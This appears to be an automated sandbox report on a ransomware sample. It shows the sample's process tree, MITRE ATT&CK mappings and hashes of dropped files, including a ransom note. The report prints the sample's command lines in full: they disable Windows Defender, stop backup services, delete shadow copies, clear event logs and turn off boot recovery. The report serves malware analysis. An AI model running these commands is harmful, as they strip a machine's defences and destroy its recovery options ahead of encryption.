PID 4768 wrote to memory of 4696	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	101
PID 4768 wrote to memory of 4696	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	101
PID 4696 wrote to memory of 4152	4696	net.exe	103
PID 4696 wrote to memory of 4152	4696	net.exe	103
PID 4768 wrote to memory of 4080	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	104
PID 4768 wrote to memory of 4080	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	104
PID 4080 wrote to memory of 2208	4080	net.exe	106
PID 4080 wrote to memory of 2208	4080	net.exe	106
PID 4768 wrote to memory of 3896	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	107
PID 4768 wrote to memory of 3896	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	107
PID 4768 wrote to memory of 4480	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	109
PID 4768 wrote to memory of 4480	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	109
PID 4768 wrote to memory of 2064	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	111
PID 4768 wrote to memory of 2064	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	111
PID 4768 wrote to memory of 2804	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	113
PID 4768 wrote to memory of 2804	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	113
PID 4768 wrote to memory of 3668	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	115
PID 4768 wrote to memory of 3668	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	115
PID 4768 wrote to memory of 3048	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	117
PID 4768 wrote to memory of 3048	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	117
PID 4768 wrote to memory of 3572	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	119
PID 4768 wrote to memory of 3572	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	119
PID 4768 wrote to memory of 652	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	121
PID 4768 wrote to memory of 652	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	121
PID 4768 wrote to memory of 4352	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	123
PID 4768 wrote to memory of 4352	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	123
PID 4768 wrote to memory of 3060	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	125
PID 4768 wrote to memory of 3060	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	125
PID 4768 wrote to memory of 4332	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	127
PID 4768 wrote to memory of 4332	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	127
PID 4768 wrote to memory of 4564	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	129
PID 4768 wrote to memory of 4564	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	129
PID 4768 wrote to memory of 2212	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	131
PID 4768 wrote to memory of 2212	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	131
PID 4768 wrote to memory of 4008	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	133
PID 4768 wrote to memory of 4008	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	133
PID 4768 wrote to memory of 3732	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	135
PID 4768 wrote to memory of 3732	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	135
PID 4768 wrote to memory of 544	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	137
PID 4768 wrote to memory of 544	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	137

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4768
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:4404
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:1660
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:1860
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:4344
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:4160
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:5000
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:4152
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UnistoreSvc_28111" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_28111" /y
    3⤵
    PID:2208
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:3896
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:4480
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:2064
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  - Launches sc.exe
  PID:2804
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:3668
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:3048
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:3572
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UnistoreSvc_28111" start= disabled
  2⤵
  - Launches sc.exe
  PID:652
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:4352
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:3060
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4332
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:4564
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:2212
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4008
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3732
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:544
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2196
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:428
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:4220
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:4748
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:4552
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:3392
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:4292
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2560
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:2904
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:3172
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:3604
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:2424
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:524
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:3436
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:2708
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:4688
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:5084
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1396
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:4400
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:2716
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:3868
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:1696
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:3624
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:4900
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:5116
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2916
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:3832
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:2116
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3648
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4888
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4416
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1756
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:3264
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:4056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2056
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:1040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3120

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\phLK_HOW_TO_DECRYPT.txt

Filesize
1KB

MD5
7c7498625660600d7277d186038c05fa

SHA1
144ea5eccf0824e9c30681f64c25224753886533

SHA256
1da21b2c48b5e60b2e6ced94b990c73a0644fc147cc13b38c022a9f1c058ad3c

SHA512
32ee4b3ba5a1c86ee47be70428204af3f30f865eba33693a235dd7c6ae51d33369b4a486ee41e837c8fbe117edf54ba0cd01b1535a369c14683ca833768d4e92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ubdxtedy.nfr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2056-2-0x00000200D7230000-0x00000200D7252000-memory.dmp

Filesize
136KB

Download